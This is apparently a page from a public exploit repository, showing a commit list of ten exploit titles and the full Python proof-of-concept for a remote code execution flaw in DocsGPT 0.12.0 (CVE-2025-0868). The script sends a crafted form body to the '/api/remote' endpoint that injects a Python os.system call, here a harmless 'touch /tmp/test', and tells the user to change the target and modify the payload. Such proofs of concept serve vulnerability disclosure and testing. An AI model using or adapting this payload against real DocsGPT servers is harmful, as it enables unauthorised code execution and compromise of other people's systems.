762197db08
10 changes to exploits/shellcodes/ghdb Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE) Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE) Zohocorp ManageEngine ADManager Plus 7210 - Elevation of Privilege Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS) Artica Proxy 4.50 - Remote Code Execution (RCE) ChurchCRM 5.9.1 - SQL Injection PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF) ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS) DocsGPT 0.12.0 - Remote Code Execution
33 lines
No EOL
1.1 KiB
Python
Executable file
33 lines
No EOL
1.1 KiB
Python
Executable file
# Exploit Title: DocsGPT 0.12.0 - Remote Code Execution
|
|
# Date: 09/04/2025
|
|
# Exploit Author: Shreyas Malhotra (OSMSEC)
|
|
# Vendor Homepage: https://github.com/arc53/docsgpt
|
|
# Software Link: https://github.com/arc53/DocsGPT/archive/refs/tags/0.12.0.zip
|
|
# Version: 0.8.1 through 0.12.0
|
|
# Tested on: Debian Linux/Ubuntu Linux/Kali Linux
|
|
# CVE: CVE-2025-0868
|
|
|
|
import requests
|
|
|
|
# TARGET CONFIG
|
|
TARGET = "http://10.0.2.15:7091" # Change this
|
|
|
|
# Malicious payload string - carefully escaped - modify the python code if necessary
|
|
malicious_data = (
|
|
'user=1&source=reddit&name=other&data={"source":"reddit",'
|
|
'"client_id":"1111","client_secret":1111,"user_agent":"111",'
|
|
'"search_queries":[""],"number_posts":10,'
|
|
'"rce\\\\":__import__(\'os\').system(\'touch /tmp/test\')}#":11}'
|
|
)
|
|
|
|
headers = {
|
|
"Content-Type": "application/x-www-form-urlencoded"
|
|
}
|
|
|
|
try:
|
|
response = requests.post(f"{TARGET}/api/remote", headers=headers, data=malicious_data)
|
|
print(f"[+] Status Code: {response.status_code}")
|
|
print("[+] Response Body:")
|
|
print(response.text)
|
|
except Exception as e:
|
|
print(f"[-] Error sending request: {e}") |